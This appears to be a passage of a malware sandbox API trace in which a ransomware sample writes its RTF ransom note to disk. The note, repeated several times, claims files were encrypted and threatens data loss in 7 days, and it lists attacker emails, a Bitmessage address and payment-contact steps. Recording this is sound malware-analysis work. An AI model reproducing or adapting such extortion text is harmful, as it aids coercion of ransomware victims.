ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.560] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.560] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.560] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 